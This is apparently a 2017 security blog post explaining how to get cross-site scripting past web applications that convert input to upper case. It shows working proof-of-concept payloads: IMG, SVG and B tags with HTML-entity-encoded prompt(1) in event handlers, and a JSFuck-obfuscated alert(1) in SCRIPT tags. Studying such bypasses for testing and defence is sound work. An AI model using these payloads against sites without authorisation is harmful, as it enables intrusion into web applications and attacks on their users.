Wednesday, 5 April 2017

Cross-Site Scripting Attacks with adverse Conditions: Upper-Case XSS

Several times I have encountered web applications that convert user-provided input to capital letters. For example, the application may behave as follows:


The injected JavaScript code (after escaping from the quotes, of course) will not be executed in the browser. Why is this the case?
Remember that the HTML tag names themselves, including <SCRIPT> are not case-sensitive, whereas the contents inside them are in fact case-sensitive.

You can circumvent this limitation by using a different injection technique that involves, for instance, <img> tags and converting the JavaScript code into HTML entities.

The payload prompt(1) converted into HTML entities leads to 
&#x70;&#x72;&#x6F;&#x6D;&#x70;&#x74;&#x28;&#x31;&#x29;

You may utilise the page https://mothereff.in/html-entities for conversion or your programming language of choice.

We will send the following (URL-encoded) payload to the application in the vulnerable parameter:

<IMG SRC=1 ONERROR=&#X70;&#X72;&#X6F;&#X6D;&#X70;&#X74;&#X28;&#X31;&#X29;>

Obviously, you are not limited to the img-tag. Actually, any HTML tag supporting JavaScript event handlers is possible. A few alternatives are provided here:

<SVG/ONLOAD=&#X70;&#X72;&#X6F;&#X6D;&#X70;&#X74;&#X28;&#X31;&#X29;>
<B/ONMOUSEOVER=&#X70;&#X72;&#X6F;&#X6D;&#X70;&#X74;&#X28;&#X31;&#X29;>Unexpected</B>

References:


EDIT 17th of June 2017: It recently has come to my attention that there is an alternative approach for circumventing the upper-case restriction. Another way is to use the atomic parts of JavaScript only to execute your code of choice, such as brought forward at http://www.jsfuck.com/
A simple <script>alert(1)</script> could be produced as follows:

<SCRIPT>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</SCRIPT>



No comments:

Post a Comment